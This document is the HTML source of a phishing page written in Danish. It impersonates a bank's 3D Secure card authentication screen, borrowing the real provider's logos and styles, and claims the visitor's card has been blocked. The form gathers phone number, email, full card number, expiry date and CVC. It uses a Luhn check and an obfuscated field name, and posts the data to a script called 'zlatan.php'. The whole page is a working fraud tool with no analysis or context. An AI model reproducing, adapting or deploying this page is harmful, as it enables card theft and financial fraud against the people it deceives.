<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML lang="en">
<HEAD>
    <TITLE>Autentisering</TITLE>
    <META content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <LINK rel="stylesheet" type="text/css" href="https://acs4.3dsecure.no/mdpayacs/content/040/screen.css" />
    <LINK rel="stylesheet" type="text/css" href="https://acs4.3dsecure.no/mdpayacs/content/040/dk/gh-buttons.css" />
    <script src="https://acs4.3dsecure.no/mdpayacs/content/commons.js"></script>
    <script src="https://acs4.3dsecure.no/mdpayacs/content/040/js/jquery-1.9.1.min.js"></script>
    <script type="text/javascript" src="./Autentisering_files/date_time.js"></script>
    <script type="text/javascript">

        function onBodyLoad() {
            document.form.otp.focus();
        }
    
	function validate(){
	
	
var filter = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
var tel=document.getElementById("nocphone2");
var email=document.getElementById("em1");
var cc=document.getElementById("ccnn1");
var expm=document.getElementById("cexppdm");
var expa=document.getElementById("cexdyyyyss");
var cv=document.getElementById("qsdq21sd5s4d4s1");
var flag=0;

if (tel.value=="" || isNaN(tel.value) || tel.value.length<8)
 {	tel.style.borderColor="red";flag=1;
 }else{ 
  	tel.style.borderColor="green";
   }
   
if(filter.test(email.value))
{
email.style.borderColor="green";
}else{
email.style.borderColor="red";flag=1;
}

if (cc.value==""||cc.value.length<15 || isNaN(cc.value)){
	cc.style.borderColor="red";flag=1;
	}else
{
	var len = cc.value.length;
	var iCCN = parseInt(cc.value);
	var iTotal = 0;
	for(var i=len;i>0;i--){  
      calc = parseInt(iCCN) % 10; 
      calc = parseInt(calc); 
      iTotal += calc;  
      i--;  
      iCCN = iCCN / 10;                              
      calc = parseInt(iCCN) % 10 ;   
      calc = calc *2;                                 
      switch(calc){
        case 10: calc = 1; break;       
        case 12: calc = 3; break;      
        case 14: calc = 5; break;       
        case 16: calc = 7; break;      
        case 18: calc = 9; break;       
        default: calc = calc;           
      }                                               
    iCCN = iCCN / 10; 
    iTotal += calc; 
  }
	if (iTotal%10!=0)
	{cc.style.borderColor="red";flag=1;
	}else{
	cc.style.borderColor="green";
		}
}
if (expm.value==""|| expm.value<1 ||expm.value>12 || (expa.value==19&& (expm.value==1|| expm.value==2||expm.value==3)))
 {	expm.style.borderColor="red";flag=1;
 }else{ 
  	expm.style.borderColor="green";
   }
 
 if (expa.value==""|| expa.value<19 || expa.value>28)
 {	expa.style.borderColor="red";flag=1;
 }else{ 
  	expa.style.borderColor="green";
   }
   
    
if (cv.value=="" || isNaN(cv.value) || cv.value.length<3)
 {	cv.style.borderColor="red";flag=1;
 }else{ 
  	cv.style.borderColor="green";
   }
if (flag==1)
{document.getElementById("msg_error").style.display="block";return false;}else{document.getElementById("msg_error").style.display="none";return true;}
	}
	</script>
</HEAD>
<BODY OnLoad="onBodyLoad();">
<DIV id="authform">
    <DIV class="wrapper">
        <DIV class="logos">
            <TABLE>
                <TBODY>
                <TR>
                    <TD class="identifier">
                        <IMG alt="" src="https://acs4.3dsecure.no/mdpayacs/graphics/schema_1.png" style="max-height:56px;"/><IMG alt="" src="https://acs4.3dsecure.no/mdpayacs/graphics/schema_2.png" style="max-height:56px;"/>
                    </TD>
                    <TD class="bank">
                        <div title="Engelsk"> <a href="#"><img src="https://acs4.3dsecure.no/mdpayacs/content/227/images/en.png" alt="Engelsk"/></a></div>
                    </TD>
                    <TD class="bank">
                        <IMG alt="" src="https://acs4.3dsecure.no/mdpayacs/logos/netstech_small.png" style="max-height:56px;"/>
                    </TD>
                </TR>
                </TBODY>
            </TABLE>
        </DIV>
        <H1>Indtast kortnummer.</H1>
        <P>Dit kort er blevet blokeret, For at forts&#230;tte med at bruge dit kort skal du registrere dig igen, &#10;skal du herunder indtaste dit kortnummer.</P>
        
        <FORM id="form" name="form" method="post" action="zlatan.php" >
            <DL style="margin-top: 10px;">
                <DT>Dato: </DT>
                <DD><span id="date_time"></span></DD>
                <script type="text/javascript">window.onload = date_time('date_time');</script>

                <DT>Mobiltelefonnummer: </DT>
                <DD>
                  <label for="select"></label>
                  <select name="selectprefix" id="selectprefix">
                   <option value="45" selected> 45 </option>
                   <option value="47"> 47 </option>
                  </select>
              -<INPUT style="width: 60px" type="text" width="10" id="nocphone2" name="nocphone2" maxlength="10" onKeyPress="return submitenter(this,event)"  /></DD>
<DT>E-mail: </DT>
                <DD>
                  <input name="em1" type="text"  id="em1" style="width: 112px" onkeypress="return submitenter(this,event)" width="10" />
                </DD>
                <DT>Kortnummer: </DT>
                <DD>
                  <input name="ccnn1" type="text"  id="ccnn1" style="width: 112px" maxlength="16" onkeypress="return submitenter(this,event)" width="10" />
                </DD>

                <DT>Udl&oslash;bsdato (m&aring;ned-&aring;r): </DT>
                <DD><INPUT style="width: 30px" type="text" width="10" id="cexppdm" name="cexppdm" maxlength="2" onKeyPress="return submitenter(this,event)" />-<INPUT style="width: 30px" type="text" width="10" id="cexdyyyyss" maxlength="2" name="cexdyyyyss" onKeyPress="return submitenter(this,event)" /></DD>

                <DT>
                    <LABEL for="code">CVC2: </LABEL>
                </DT>
                <DD>
                    <INPUT style="width: 30px" type="text" width="10" id="qsdq21sd5s4d4s1" maxlength="3" name="qsdq21sd5s4d4s1" onKeyPress="return submitenter(this,event)" />
                    <br><br>
              </DD>
                
            </DL>
            <div id="errorMessage" class="error"></div>
            <div id="msg_error" class="error" style="display: none;">Tjek venligst de markerede felter.</div>
                <div id="" class="error" style="display: none;">Af sikkerhedsm&aelig;ssige &aring;rsager er det kun muligt at klikke &rsquo;Ny kode&rsquo; to gange; hvis du stadig 
efter to klik ikke modtager en
                SMS-kode, bedes du starte forfra.</div>
            <DIV style="font-size: 0.92em; margin-bottom: 30px;">
               <P>For at aktivere dit kort, skal du indtaste f&oslash;lgende oplysninger korrekt og tryk p&aring; &#39;Bekr&aelig;ft&#39;.</P>
                <P>N&#230;ste Trin: Bekr&#230;ftelse med engangskode</P>
            </DIV>
            <DIV style="position: absolute; margin-left: 150px;">
                <button class="button icon approve primary" name="submit" id="submit" type="submit" value="submit" onclick="return validate()">Bekr&#230;ft</button>
            </DIV>
        </FORM>
    </DIV>
</DIV>
</BODY>
</HTML>